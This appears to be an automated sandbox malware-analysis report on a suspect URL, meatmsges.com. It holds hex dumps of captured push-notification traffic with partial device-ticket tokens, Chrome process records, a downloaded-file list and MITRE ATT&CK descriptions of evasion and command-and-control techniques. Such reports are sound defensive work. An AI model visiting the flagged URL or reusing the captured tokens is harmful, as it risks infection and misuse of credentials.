<connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-10-01 23:13:35 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 74 73 70 75 79 52 70 53 45 55 36 63 7a 31 4a 41 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 32 34 32 32 39 66 34 30 31 36 38 32 38 31 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 41 53 65 66 6f 69 66 59 57 62 71 56 6d 78 74 71 59 63 32 42 54 5a 33 64 52 46 64 5a 74 2b 74 4e 63 74 66 55 4d 54 37 4b 75 49 76 2b 43 50 72 51 63 70 56 64 41 32 7a 6f 4f 51 4a 36 2b 67 49 76 58 30 47 47 43 52 61 5a 75 66 57 55 2f 77 49 33 51 2b 54 55 35 4f 68 33 39 68 39 61 70 4d 42 42 77 39 77 74 56 78 32 79 53 31 73 4a Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: tspuyRpSEU6cz1JA.2Context: 724229f401682815<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdASefoifYWbqVmxtqYc2BTZ3dRFdZt+tNctfUMT7KuIv+CPrQcpVdA2zoOQJ6+gIvX0GGCRaZufWU/wI3Q+TU5Oh39h9apMBBw9wtVx2yS1sJ
2024-10-01 23:13:35 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 74 73 70 75 79 52 70 53 45 55 36 63 7a 31 4a 41 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 32 34 32 32 39 66 34 30 31 36 38 32 38 31 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: tspuyRpSEU6cz1JA.3Context: 724229f401682815<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-10-01 23:13:36 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-10-01 23:13:36 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 32 42 76 77 7a 5a 75 2f 68 6b 79 6a 6e 63 4e 73 68 72 35 32 43 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 2BvwzZu/hkyjncNshr52CA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.6	49730	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-10-01 23:13:49 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 41 52 4c 47 73 52 52 39 79 55 43 6a 76 33 4e 34 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 38 37 65 37 32 65 62 65 35 64 33 61 64 62 64 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: ARLGsRR9yUCjv3N4.1Context: f87e72ebe5d3adbd
2024-10-01 23:13:49 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-10-01 23:13:49 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 41 52 4c 47 73 52 52 39 79 55 43 6a 76 33 4e 34 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 38 37 65 37 32 65 62 65 35 64 33 61 64 62 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 41 53 65 66 6f 69 66 59 57 62 71 56 6d 78 74 71 59 63 32 42 54 5a 33 64 52 46 64 5a 74 2b 74 4e 63 74 66 55 4d 54 37 4b 75 49 76 2b 43 50 72 51 63 70 56 64 41 32 7a 6f 4f 51 4a 36 2b 67 49 76 58 30 47 47 43 52 61 5a 75 66 57 55 2f 77 49 33 51 2b 54 55 35 4f 68 33 39 68 39 61 70 4d 42 42 77 39 77 74 56 78 32 79 53 31 73 4a Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ARLGsRR9yUCjv3N4.2Context: f87e72ebe5d3adbd<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdASefoifYWbqVmxtqYc2BTZ3dRFdZt+tNctfUMT7KuIv+CPrQcpVdA2zoOQJ6+gIvX0GGCRaZufWU/wI3Q+TU5Oh39h9apMBBw9wtVx2yS1sJ
2024-10-01 23:13:49 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 41 52 4c 47 73 52 52 39 79 55 43 6a 76 33 4e 34 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 38 37 65 37 32 65 62 65 35 64 33 61 64 62 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: ARLGsRR9yUCjv3N4.3Context: f87e72ebe5d3adbd<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-10-01 23:13:49 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-10-01 23:13:49 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 4f 71 75 31 69 32 4c 71 5a 30 53 75 41 41 48 33 49 50 74 62 58 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: Oqu1i2LqZ0SuAAH3IPtbXQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.6	49731	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-10-01 23:14:10 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 48 6d 72 41 31 4c 30 68 4c 55 32 72 4d 6a 6b 58 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 39 65 36 63 34 62 35 66 33 62 32 30 37 64 64 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: HmrA1L0hLU2rMjkX.1Context: e9e6c4b5f3b207dd
2024-10-01 23:14:10 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-10-01 23:14:10 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 48 6d 72 41 31 4c 30 68 4c 55 32 72 4d 6a 6b 58 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 39 65 36 63 34 62 35 66 33 62 32 30 37 64 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 41 53 65 66 6f 69 66 59 57 62 71 56 6d 78 74 71 59 63 32 42 54 5a 33 64 52 46 64 5a 74 2b 74 4e 63 74 66 55 4d 54 37 4b 75 49 76 2b 43 50 72 51 63 70 56 64 41 32 7a 6f 4f 51 4a 36 2b 67 49 76 58 30 47 47 43 52 61 5a 75 66 57 55 2f 77 49 33 51 2b 54 55 35 4f 68 33 39 68 39 61 70 4d 42 42 77 39 77 74 56 78 32 79 53 31 73 4a Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: HmrA1L0hLU2rMjkX.2Context: e9e6c4b5f3b207dd<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdASefoifYWbqVmxtqYc2BTZ3dRFdZt+tNctfUMT7KuIv+CPrQcpVdA2zoOQJ6+gIvX0GGCRaZufWU/wI3Q+TU5Oh39h9apMBBw9wtVx2yS1sJ
2024-10-01 23:14:10 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 48 6d 72 41 31 4c 30 68 4c 55 32 72 4d 6a 6b 58 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 39 65 36 63 34 62 35 66 33 62 32 30 37 64 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: HmrA1L0hLU2rMjkX.3Context: e9e6c4b5f3b207dd<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-10-01 23:14:10 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-10-01 23:14:10 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 31 61 6b 68 31 39 6e 61 2f 6b 4b 6b 33 31 4a 38 4b 73 37 6e 41 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 1akh19na/kKk31J8Ks7nAw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.6	49735	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-10-01 23:14:40 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 49 66 64 59 6d 75 62 77 55 79 56 45 30 42 34 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 66 33 30 33 31 30 39 64 36 33 38 63 64 32 36 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 7IfdYmubwUyVE0B4.1Context: cf303109d638cd26
2024-10-01 23:14:40 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-10-01 23:14:40 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 37 49 66 64 59 6d 75 62 77 55 79 56 45 30 42 34 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 66 33 30 33 31 30 39 64 36 33 38 63 64 32 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 41 53 65 66 6f 69 66 59 57 62 71 56 6d 78 74 71 59 63 32 42 54 5a 33 64 52 46 64 5a 74 2b 74 4e 63 74 66 55 4d 54 37 4b 75 49 76 2b 43 50 72 51 63 70 56 64 41 32 7a 6f 4f 51 4a 36 2b 67 49 76 58 30 47 47 43 52 61 5a 75 66 57 55 2f 77 49 33 51 2b 54 55 35 4f 68 33 39 68 39 61 70 4d 42 42 77 39 77 74 56 78 32 79 53 31 73 4a Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 7IfdYmubwUyVE0B4.2Context: cf303109d638cd26<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdASefoifYWbqVmxtqYc2BTZ3dRFdZt+tNctfUMT7KuIv+CPrQcpVdA2zoOQJ6+gIvX0GGCRaZufWU/wI3Q+TU5Oh39h9apMBBw9wtVx2yS1sJ
2024-10-01 23:14:40 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 37 49 66 64 59 6d 75 62 77 55 79 56 45 30 42 34 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 66 33 30 33 31 30 39 64 36 33 38 63 64 32 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 7IfdYmubwUyVE0B4.3Context: cf303109d638cd26<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-10-01 23:14:40 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-10-01 23:14:40 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 62 64 6d 48 4b 59 53 56 65 55 57 65 61 58 54 41 6a 72 2f 2f 73 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: bdmHKYSVeUWeaXTAjr//sQ.0Payload parsing failed.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 528, Parent PID: 5668

General

Target ID:	0
Start time:	19:13:19
Start date:	01/10/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 1292, Parent PID: 528

General

Target ID:	2
Start time:	19:13:23
Start date:	01/10/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2016,i,6749215070553399495,10088058227417400095,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 2672, Parent PID: 5668

General

Target ID:	3
Start time:	19:13:25
Start date:	01/10/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://meatmsges.com/"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://meatmsges.com/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Downloads\2b717224-b1c5-454b-a1c0-69273071f69f.tmp

C:\Users\user\Downloads\Unconfirmed 732148.crdownload

Chrome Cache Entry: 43

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 528, Parent PID: 5668

General

Chronological Activities

Analysis Process: chrome.exePID: 1292, Parent PID: 528

General

Chronological Activities

Analysis Process: chrome.exePID: 2672, Parent PID: 5668

General

Chronological Activities

Disassembly

Windows Analysis Report
https://meatmsges.com/